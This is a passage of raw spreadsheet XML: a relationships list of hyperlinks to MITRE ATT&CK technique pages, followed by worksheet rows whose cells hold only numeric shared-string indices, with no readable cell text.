Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/004" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/003" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/004" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/001" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/001" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/001" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/004" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/004" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/001" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/007" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/005" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/005" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1570" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/002" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/007" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/001" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/004" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/001" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/002" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/004" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/005" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/002" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/002" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/006" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/005" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/008" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1554" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/001" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/012" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/002" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1496" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/011" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/001" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/002" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/003" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/001" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/001" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/002" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/003" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/005" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1610" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/003"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K494"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E2" sqref="E2:E494"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="2" max="2" width="10.83203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="2" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A2" t="s">
        <v>11</v>
      </c>
      <c r="B2" t="s">
        <v>12</v>
      </c>
      <c r="C2" t="s">
        <v>13</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>14</v>
      </c>
      <c r="E2" t="s">
        <v>15</v>
      </c>
      <c r="F2" t="s">
        <v>16</v>
      </c>
      <c r="G2" t="s">
        <v>17</v>
      </c>
      <c r="H2" t="s">
        <v>18</v>
      </c>
      <c r="J2" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="3" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>20</v>
      </c>
      <c r="B3" t="s">
        <v>21</v>
      </c>
      <c r="C3" t="s">
        <v>22</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" t="s">
        <v>15</v>
      </c>
      <c r="F3" t="s">
        <v>16</v>
      </c>
      <c r="G3" t="s">
        <v>17</v>
      </c>
      <c r="H3" t="s">
        <v>18</v>
      </c>
      <c r="J3" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="4" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>24</v>
      </c>
      <c r="B4" t="s">
        <v>25</v>
      </c>
      <c r="C4" t="s">
        <v>26</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>27</v>
      </c>
      <c r="E4" t="s">
        <v>28</v>
      </c>
      <c r="F4" t="s">
        <v>29</v>
      </c>
      <c r="G4" t="s">
        <v>30</v>
      </c>
      <c r="H4" t="s">
        <v>18</v>
      </c>
      <c r="J4" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="5" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>31</v>
      </c>
      <c r="B5" t="s">
        <v>32</v>
      </c>
      <c r="C5" t="s">
        <v>33</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>34</v>
      </c>
      <c r="E5" t="s">
        <v>15</v>
      </c>
      <c r="F5" t="s">
        <v>16</v>
      </c>
      <c r="G5" t="s">
        <v>17</v>
      </c>
      <c r="H5" t="s">
        <v>18</v>
      </c>
      <c r="I5" t="s">
        <v>35</v>
      </c>
      <c r="J5" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="6" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>36</v>
      </c>
      <c r="B6" t="s">
        <v>37</v>
      </c>
      <c r="C6" t="s">
        <v>38</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>39</v>
      </c>
      <c r="E6" t="s">
        <v>15</v>
      </c>
      <c r="F6" t="s">
        <v>16</v>
      </c>
      <c r="G6" t="s">
        <v>17</v>
      </c>
      <c r="H6" t="s">
        <v>18</v>
      </c>
      <c r="I6" t="s">
        <v>40</v>
      </c>
      <c r="J6" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="7" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A7" t="s">
        <v>41</v>
      </c>
      <c r="B7" t="s">
        <v>42</v>
      </c>
      <c r="C7" t="s">
        <v>43</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>44</v>
      </c>
      <c r="E7" t="s">
        <v>45</v>
      </c>
      <c r="F7" t="s">
        <v>46</v>
      </c>
      <c r="G7" t="s">
        <v>30</v>
      </c>
      <c r="H7" t="s">
        <v>18</v>
      </c>
      <c r="J7" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="8" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A8" t="s">
        <v>48</v>
      </c>
      <c r="B8" t="s">
        <v>49</v>
      </c>
      <c r="C8" t="s">
        <v>50</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>51</v>
      </c>
      <c r="E8" t="s">
        <v>52</v>
      </c>
      <c r="F8" t="s">
        <v>53</v>
      </c>
      <c r="G8" t="s">
        <v>54</v>
      </c>
      <c r="H8" t="s">
        <v>18</v>
      </c>
      <c r="J8" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="9" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A9" t="s">
        <v>55</v>
      </c>
      <c r="B9" t="s">
        <v>56</v>
      </c>
      <c r="C9" t="s">
        <v>57</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>58</v>
      </c>
      <c r="E9" t="s">
        <v>15</v>
      </c>
      <c r="F9" t="s">
        <v>16</v>
      </c>
      <c r="G9" t="s">
        <v>17</v>
      </c>
      <c r="H9" t="s">
        <v>18</v>
      </c>
      <c r="J9" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="10" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A10" t="s">
        <v>59</v>
      </c>
      <c r="B10" t="s">
        <v>60</v>
      </c>
      <c r="C10" t="s">
        <v>61</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>62</v>
      </c>
      <c r="E10" t="s">
        <v>63</v>
      </c>
      <c r="F10" t="s">
        <v>64</v>
      </c>
      <c r="G10" t="s">
        <v>30</v>
      </c>
      <c r="H10" t="s">
        <v>65</v>
      </c>
      <c r="I10" t="s">
        <v>66</v>
      </c>
      <c r="J10" t="s">
        <v>19</v>
      </c>
      <c r="K10" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="11" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A11" t="s">
        <v>68</v>
      </c>
      <c r="B11" t="s">
        <v>69</v>
      </c>
      <c r="C11" t="s">
        <v>70</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>71</v>
      </c>
      <c r="E11" t="s">
        <v>72</v>
      </c>
      <c r="F11" t="s">
        <v>73</v>
      </c>
      <c r="G11" t="s">
        <v>30</v>
      </c>
      <c r="H11" t="s">
        <v>74</v>
      </c>
      <c r="J11" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="12" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A12" t="s">
        <v>75</v>
      </c>
      <c r="B12" t="s">
        <v>76</v>
      </c>
      <c r="C12" t="s">
        <v>77</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>78</v>
      </c>
      <c r="E12" t="s">
        <v>79</v>
      </c>
      <c r="F12" t="s">
        <v>80</v>
      </c>
      <c r="G12" t="s">
        <v>30</v>
      </c>
      <c r="H12" t="s">
        <v>18</v>
      </c>
      <c r="J12" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="13" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A13" t="s">
        <v>81</v>
      </c>
      <c r="B13" t="s">
        <v>82</v>
      </c>
      <c r="C13" t="s">
        <v>83</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>84</v>
      </c>
      <c r="E13" t="s">
        <v>15</v>
      </c>
      <c r="F13" t="s">
        <v>85</v>
      </c>
      <c r="G13" t="s">
        <v>30</v>
      </c>
      <c r="H13" t="s">
        <v>86</v>
      </c>
      <c r="I13" t="s">
        <v>87</v>
      </c>
      <c r="J13" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="14" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A14" t="s">
        <v>88</v>
      </c>
      <c r="B14" t="s">
        <v>89</v>
      </c>
      <c r="C14" t="s">
        <v>90</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>91</v>
      </c>
      <c r="E14" t="s">
        <v>92</v>
      </c>
      <c r="F14" t="s">
        <v>93</v>
      </c>
      <c r="G14" t="s">
        <v>94</v>
      </c>
      <c r="H14" t="s">
        <v>18</v>
      </c>
      <c r="I14" t="s">
        <v>95</v>
      </c>
      <c r="J14" t="s">
        <v>19</v>
      </c>
      <c r="K14" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="15" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A15" t="s">
        <v>97</v>
      </c>
      <c r="B15" t="s">
        <v>98</v>
      </c>
      <c r="C15" t="s">
        <v>99</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>100</v>
      </c>
      <c r="E15" t="s">
        <v>101</v>
      </c>
      <c r="F15" t="s">
        <v>102</v>
      </c>
      <c r="G15" t="s">
        <v>30</v>
      </c>
      <c r="H15" t="s">
        <v>18</v>
      </c>
      <c r="J15" t="s">
        <v>19</v>
      </c>
      <c r="K15" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="16" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A16" t="s">
        <v>104</v>
      </c>
      <c r="B16" t="s">
        <v>105</v>
      </c>
      <c r="C16" t="s">
        <v>106</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>107</v>
      </c>
      <c r="E16" t="s">
        <v>108</v>
      </c>
      <c r="F16" t="s">
        <v>16</v>
      </c>
      <c r="G16" t="s">
        <v>17</v>
      </c>
      <c r="H16" t="s">
        <v>18</v>
      </c>
      <c r="I16" t="s">
        <v>109</v>
      </c>
      <c r="J16" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="17" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A17" t="s">
        <v>110</v>
      </c>
      <c r="B17" t="s">
        <v>111</v>
      </c>
      <c r="C17" t="s">
        <v>112</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>113</v>
      </c>
      <c r="E17" t="s">
        <v>15</v>
      </c>
      <c r="F17" t="s">
        <v>16</v>
      </c>
      <c r="G17" t="s">
        <v>17</v>
      </c>
      <c r="H17" t="s">
        <v>18</v>
      </c>
      <c r="J17" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="18" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A18" t="s">
        <v>114</v>
      </c>
      <c r="B18" t="s">
        <v>115</v>
      </c>
      <c r="C18" t="s">
        <v>116</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>117</v>
      </c>
      <c r="E18" t="s">
        <v>118</v>
      </c>
      <c r="F18" t="s">
        <v>29</v>
      </c>
      <c r="G18" t="s">
        <v>30</v>
      </c>
      <c r="H18" t="s">
        <v>18</v>
      </c>
      <c r="J18" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="19" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A19" t="s">
        <v>119</v>
      </c>
      <c r="B19" t="s">
        <v>120</v>
      </c>
      <c r="C19" t="s">
        <v>121</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>122</v>
      </c>
      <c r="E19" t="s">
        <v>108</v>
      </c>
      <c r="F19" t="s">
        <v>16</v>
      </c>
      <c r="G19" t="s">
        <v>54</v>
      </c>
      <c r="H19" t="s">
        <v>18</v>
      </c>
      <c r="J19" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="20" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A20" t="s">
        <v>123</v>
      </c>
      <c r="B20" t="s">
        <v>124</v>
      </c>
      <c r="C20" t="s">
        <v>125</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>126</v>
      </c>
      <c r="E20" t="s">
        <v>15</v>
      </c>
      <c r="F20" t="s">
        <v>16</v>
      </c>
      <c r="G20" t="s">
        <v>17</v>
      </c>
      <c r="H20" t="s">
        <v>18</v>
      </c>
      <c r="I20" t="s">
        <v>127</v>
      </c>
      <c r="J20" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="21" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A21" t="s">
        <v>128</v>
      </c>
      <c r="B21" t="s">
        <v>129</v>
      </c>
      <c r="C21" t="s">
        <v>130</v>
      </c>
      <c r="D21" s="2" t="s">
        <v>131</v>
      </c>
      <c r="E21" t="s">
        <v>85</v>
      </c>
      <c r="F21" t="s">
        <v>16</v>
      </c>
      <c r="G21" t="s">
        <v>17</v>
      </c>
      <c r="H21" t="s">
        <v>18</v>
      </c>
      <c r="J21" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="22" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A22" t="s">
        <v>132</v>
      </c>
      <c r="B22" t="s">
        <v>133</v>
      </c>
      <c r="C22" t="s">
        <v>134</v>
      </c>
      <c r="D22" s="2" t="s">
        <v>135</v>
      </c>
      <c r="E22" t="s">
        <v>15</v>
      </c>
      <c r="F22" t="s">
        <v>136</v>
      </c>
      <c r="G22" t="s">
        <v>54</v>
      </c>
      <c r="H22" t="s">
        <v>18</v>
      </c>
      <c r="J22" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="23" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A23" t="s">
        <v>137</v>
      </c>
      <c r="B23" t="s">
        <v>138</v>
      </c>
      <c r="C23" t="s">
        <v>139</v>
      </c>
      <c r="D23" s="2" t="s">
        <v>140</v>
      </c>
      <c r="E23" t="s">
        <v>28</v>
      </c>
      <c r="F23" t="s">
        <v>29</v>
      </c>
      <c r="G23" t="s">
        <v>30</v>
      </c>
      <c r="H23" t="s">
        <v>18</v>
      </c>
      <c r="J23" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="24" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A24" t="s">
        <v>141</v>
      </c>
      <c r="B24" t="s">
        <v>142</v>
      </c>
      <c r="C24" t="s">
        <v>143</v>
      </c>
      <c r="D24" s="2" t="s">
        <v>144</v>
      </c>
      <c r="E24" t="s">
        <v>15</v>
      </c>
      <c r="F24" t="s">
        <v>16</v>
      </c>
      <c r="G24" t="s">
        <v>54</v>
      </c>
      <c r="H24" t="s">
        <v>18</v>
      </c>
      <c r="J24" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="25" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A25" t="s">
        <v>145</v>
      </c>
      <c r="B25" t="s">
        <v>146</v>
      </c>
      <c r="C25" t="s">
        <v>147</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>148</v>
      </c>
      <c r="E25" t="s">
        <v>15</v>
      </c>
      <c r="F25" t="s">
        <v>16</v>
      </c>
      <c r="G25" t="s">
        <v>54</v>
      </c>
      <c r="H25" t="s">
        <v>18</v>
      </c>
      <c r="J25" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="26" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A26" t="s">
        <v>149</v>
      </c>
      <c r="B26" t="s">
        <v>150</v>
      </c>
      <c r="C26" t="s">
        <v>151</v>
      </c>
      <c r="D26" s="2" t="s">
        <v>152</v>
      </c>
      <c r="E26" t="s">
        <v>153</v>
      </c>
      <c r="F26" t="s">
        <v>154</v>
      </c>
      <c r="G26" t="s">
        <v>54</v>
      </c>
      <c r="H26" t="s">
        <v>18</v>
      </c>
      <c r="J26" t="s">
        <v>47</v>
      </c>
      <c r="K26" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="27" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A27" t="s">
        <v>156</v>
      </c>
      <c r="B27" t="s">
        <v>157</v>
      </c>
      <c r="C27" t="s">
        <v>158</v>
      </c>
      <c r="D27" s="2" t="s">
        <v>159</v>
      </c>
      <c r="E27" t="s">
        <v>15</v>
      </c>
      <c r="F27" t="s">
        <v>16</v>
      </c>
      <c r="G27" t="s">
        <v>17</v>
      </c>
      <c r="H27" t="s">
        <v>18</v>
      </c>
      <c r="J27" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="28" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A28" t="s">
        <v>160</v>
      </c>
      <c r="B28" t="s">
        <v>161</v>
      </c>
      <c r="C28" t="s">
        <v>162</v>
      </c>
      <c r="D28" s="2" t="s">
        <v>163</v>
      </c>
      <c r="E28" t="s">
        <v>164</v>
      </c>
      <c r="F28" t="s">
        <v>165</v>
      </c>
      <c r="G28" t="s">
        <v>30</v>
      </c>
      <c r="H28" t="s">
        <v>18</v>
      </c>
      <c r="J28" t="s">
        <v>19</v>
      </c>
      <c r="K28" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="29" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A29" t="s">
        <v>167</v>
      </c>
      <c r="B29" t="s">
        <v>168</v>
      </c>
      <c r="C29" t="s">
        <v>169</v>
      </c>
      <c r="D29" s="2" t="s">
        <v>170</v>
      </c>
      <c r="E29" t="s">
        <v>171</v>
      </c>
      <c r="F29" t="s">
        <v>172</v>
      </c>
      <c r="G29" t="s">
        <v>54</v>
      </c>
      <c r="H29" t="s">
        <v>18</v>
      </c>
      <c r="J29" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="30" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A30" t="s">
        <v>173</v>
      </c>
      <c r="B30" t="s">
        <v>174</v>
      </c>
      <c r="C30" t="s">
        <v>175</v>
      </c>
      <c r="D30" s="2" t="s">
        <v>176</v>
      </c>
      <c r="E30" t="s">
        <v>177</v>
      </c>
      <c r="F30" t="s">
        <v>178</v>
      </c>
      <c r="G30" t="s">
        <v>30</v>
      </c>
      <c r="H30" t="s">
        <v>18</v>
      </c>
      <c r="J30" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="31" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A31" t="s">
        <v>179</v>
      </c>
      <c r="B31" t="s">
        <v>180</v>
      </c>
      <c r="C31" t="s">
        <v>181</v>
      </c>
      <c r="D31" s="2" t="s">
        <v>182</v>
      </c>
      <c r="E31" t="s">
        <v>15</v>
      </c>
      <c r="F31" t="s">
        <v>172</v>
      </c>
      <c r="G31" t="s">
        <v>17</v>
      </c>
      <c r="H31" t="s">
        <v>18</v>
      </c>
      <c r="J31" t="s">
        <v>19</v>
      </c>
      <c r="K31" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="32" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A32" t="s">
        <v>184</v>
      </c>
      <c r="B32" t="s">
        <v>185</v>
      </c>
      <c r="C32" t="s">
        <v>186</v>
      </c>
      <c r="D32" s="2" t="s">
        <v>187</v>
      </c>
      <c r="E32" t="s">
        <v>15</v>
      </c>
      <c r="F32" t="s">
        <v>16</v>
      </c>
      <c r="G32" t="s">
        <v>17</v>
